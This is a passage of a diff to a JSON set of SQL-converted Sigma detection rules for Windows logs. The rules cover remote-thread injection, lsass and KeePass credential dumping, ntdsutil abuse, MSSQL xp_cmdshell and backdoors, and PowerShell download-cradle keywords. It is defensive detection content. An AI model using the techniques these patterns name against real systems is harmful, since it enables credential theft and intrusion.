"rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppxPackaging/Operational' AND EventID = '157' AND subjectName = 'CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization')" ], - "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" + "filename": "win_appxpackaging_om_sups_appx_signature.yml" }, { - "title": "CreateRemoteThread API and LoadLibrary", - "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", + "title": "Atera Agent Installation", + "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", "status": "test", - "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate Atera agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_loadlibrary.yml" + "filename": "win_software_atera_rmm_agent_install.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", - "id": 
"fb656378-f909-47c1-8747-278bf09f4f4f", + "title": "MSI Installation From Suspicious Locations", + "id": "c7c8aa1c-5aff-408e-828b-998e3620b341", "status": "experimental", - "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects MSI package installation from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND (Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\\\\\\\*' ESCAPE '\\')) AND NOT ((Data LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\') OR (Data LIKE '%C:\\\\Windows\\\\TEMP\\\\UpdHealthTools.msi%' ESCAPE '\\')))" ], - "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "win_msi_install_from_susp_locations.yml" }, { - "title": "Remote Thread Creation in Suspicious Targets", - "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "title": "MSI Installation From Web", + "id": "5594e67a-7f92-4a04-b65d-1a42fd824a60", "status": "experimental", - "description": "Detects a remote thread creation in suspicious target images", - "author": "Florian Roth 
(Nextron Systems)", + "description": "Detects installation of a remote msi file from web.", + "author": "Stamatis Chatzimangou", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.003" + "attack.execution", + "attack.t1218", + "attack.t1218.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND Data LIKE '%://%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_targets.yml" + "filename": "win_msi_install_from_web.yml" }, { - "title": "KeePass Password Dumping", - "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", + "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", + "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", "status": "experimental", - "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", - "author": "Timon Hackenjos", + "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.005" + "attack.initial_access", + "attack.t1190" ], "falsepositives": [ - "Unknown" + "Other MSI packages for which your admins have used that name" ], "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_password_dumper_keepass.yml" + "filename": "win_vul_cve_2021_41379.yml" }, { - "title": "Bumblebee Remote Thread Creation", - "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "title": "Dump Ntds.dit To Suspicious Location", + "id": "94dc4390-6b7c-4784-8ffc-335334404650", "status": "experimental", - "description": "Detects remote thread injection events based on action seen used by bumblebee", + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate backup operation/creating shadow copies" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID = '325' AND Data LIKE '%ntds.dit%' ESCAPE '\\' AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Appdata\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\ntds.dit%' ESCAPE '\\'))" ], - "filename": "create_remote_thread_win_bumblebee.yml" 
+ "filename": "win_esent_ntdsutil_abuse_susp_location.yml" }, { - "title": "Suspicious Remote Thread Target", - "id": "f016c716-754a-467f-a39e-63c06f773987", + "title": "Ntdsutil Abuse", + "id": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.execution" + ], "falsepositives": [ - "Unknown" + "Legitimate backup operation/creating shadow copies" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (SourceImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR SourceImage LIKE '%unknown process%' ESCAPE '\\' OR StartFunction = 'EtwpNotificationThread'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID IN ('216', '325', '326', '327') AND Data LIKE '%ntds.dit%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_remote_thread_target.yml" + "filename": "win_esent_ntdsutil_abuse.yml" }, { - "title": "Password Dumper Remote Thread in LSASS", - "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", - "status": "stable", - "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the 
malicious program. A single execution can lead to hundreds of events.\n", - "author": "Thomas Patzke", + "title": "Microsoft Malware Protection Engine Crash - WER", + "id": "6c82cf5c-090d-4d57-9188-533577631108", + "status": "experimental", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.s0005", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Antivirus products" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Windows Error Reporting' AND EventID = '1001' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_password_dumper_lsass.yml" + "filename": "win_application_msmpeng_crash_wer.yml" }, { - "title": "Remote Thread Creation Ttdinject.exe Proxy", - "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "title": "Audit CVE Event", + "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", "status": "experimental", - "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", - "author": "frack113", + "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 
2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", + "author": "Florian Roth (Nextron Systems), Zach Mathis", "tags": [ + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068", "attack.defense_evasion", - "attack.t1127" + "attack.t1211", + "attack.credential_access", + "attack.t1212", + "attack.lateral_movement", + "attack.t1210", + "attack.impact", + "attack.t1499.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" ], - "filename": "create_remote_thread_win_ttdinjec.yml" + "filename": "win_audit_cve.yml" }, { - "title": "Suspicious Remote Thread Source", - "id": "66d31e5f-52d6-40a4-9615-002d3789a119", + "title": "Microsoft Malware Protection Engine Crash", + "id": "545a5da6-f103-4919-a519-e9aec1026ee4", "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", - "author": "Perez Diego (@darkquassar), oscd.community", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1055" + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" 
+ "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE 
'%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA 
GeForce Experience.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_remote_thread_source.yml" + "filename": "win_application_msmpeng_crash_error.yml" }, { - "title": "Accessing WinAPI in PowerShell. Code Injection", - "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", - "status": "test", - "description": "Detects the creation of a remote thread from a Powershell process to another process", - "author": "Nikita Nazarov, oscd.community", + "title": "Potential Credential Dumping Via WER - Application", + "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "status": "experimental", + "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate crashing of the lsass process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" ], - "filename": "create_remote_thread_win_powershell_code_injection.yml" + "filename": "win_werfault_susp_lsass_credential_dump.yml" }, { - "title": "CACTUSTORCH Remote Thread Creation", - "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", - 
"status": "test", - "description": "Detects remote thread creation from CACTUSTORCH as described in references.", - "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "title": "Restricted Software Access By SRP", + "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "status": "experimental", + "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1055.012", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1218.005" + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" ], - "filename": "create_remote_thread_win_cactustorch.yml" + "filename": "win_software_restriction_policies_block.yml" }, { - "title": "PowerShell Rundll32 Remote Thread Creation", - "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", - "status": "experimental", - "description": "Detects PowerShell remote thread creation in Rundll32.exe", - "author": "Florian Roth (Nextron Systems)", + "title": "Backup Catalog Deleted", + "id": "9703792d-fd9a-456d-a672-ff92efe4806a", + "status": "test", + "description": "Detects backup catalog deletions", + "author": "Florian Roth (Nextron Systems), Tom U. 
@c_APT_ure (collection)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '524' AND Provider_Name = 'Microsoft-Windows-Backup')" ], - "filename": "create_remote_thread_win_susp_powershell_rundll32.yml" + "filename": "win_susp_backup_delete.yml" }, { - "title": "WMI Event Subscription", - "id": "0f06a3a5-6a09-413f-8743-e6cf35561297", - "status": "test", - "description": "Detects creation of WMI event subscription persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "title": "MSSQL XPCmdshell Option Change", + "id": "d08dd86f-681e-4a00-a92c-1db218754417", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.execution" ], "falsepositives": [ - "Exclude legitimate (vetted) use of WMI event subscription in your network" + "Legitimate enable/disable of the setting", + "Note that since the event contain the change for both values. 
This means that this will trigger on both enable and disable" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" ], - "filename": "sysmon_wmi_event_subscription.yml" + "filename": "win_mssql_xp_cmdshell_change.yml" }, { - "title": "Suspicious Scripting in a WMI Consumer", - "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "title": "MSSQL Add Account To Sysadmin Role", + "id": "08200f85-2678-463e-9c32-88dce2f073d1", "status": "experimental", - "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005" + "attack.persistence" ], "falsepositives": [ - "Legitimate administrative scripts" + "Rare legitimate administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') 
OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" ], - "filename": "sysmon_wmi_susp_scripting.yml" + "filename": "win_mssql_add_sysadmin_account.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - Sysmon", - "id": "065cceea-77ec-4030-9052-fc0affea7110", + "title": "MSSQL Extended Stored Procedure Backdoor Maggie", + "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", "status": "experimental", - "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", - "author": "pH-T (Nextron Systems)", + "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", + "author": "Denis Szadkowski, DIRT / DCSO CyTec", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.persistence", + "attack.t1546" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Legitimate extended stored procedures named maggie" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" ], - "filename": "dns_query_win_anonymfiles_com.yml" + "filename": "win_mssql_sp_maggie.yml" }, { - "title": "DNS HybridConnectionManager Service Bus", - "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", - "status": "test", - "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", - "author": 
"Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "MSSQL SPProcoption Set", + "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "status": "experimental", + "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.persistence" ], "falsepositives": [ - "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + "Legitimate use of the feature by administrators (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND Image LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" + "filename": "win_mssql_sp_procoption_set.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", - "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", - "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Florian Roth (Nextron Systems)", + "title": "MSSQL XPCmdshell Suspicious Execution", + "id": "7f103213-a04e-4d59-8261-213dddf22314", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": 
